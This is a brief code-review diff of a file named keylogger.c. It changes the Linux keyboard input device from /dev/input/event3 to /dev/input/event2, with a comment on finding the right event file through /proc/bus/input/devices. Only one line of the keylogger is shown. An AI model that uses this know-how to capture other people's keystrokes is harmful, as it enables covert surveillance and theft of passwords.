keylogger.c

```diff
@@ -7,10 +7,9 @@
 #include <string.h>
 
 void keylogger(const char *logfile) {
-    const char *device = "/dev/input/event3"; // Change this to your keyboard's event file
+    const char *device = "/dev/input/event2"; // Change this to your keyboard's event file
```

Comment:
depends on the device. may refer command: cat /proc/bus/input/devices

The event file corresponding to this keyboard is /dev/input/event2.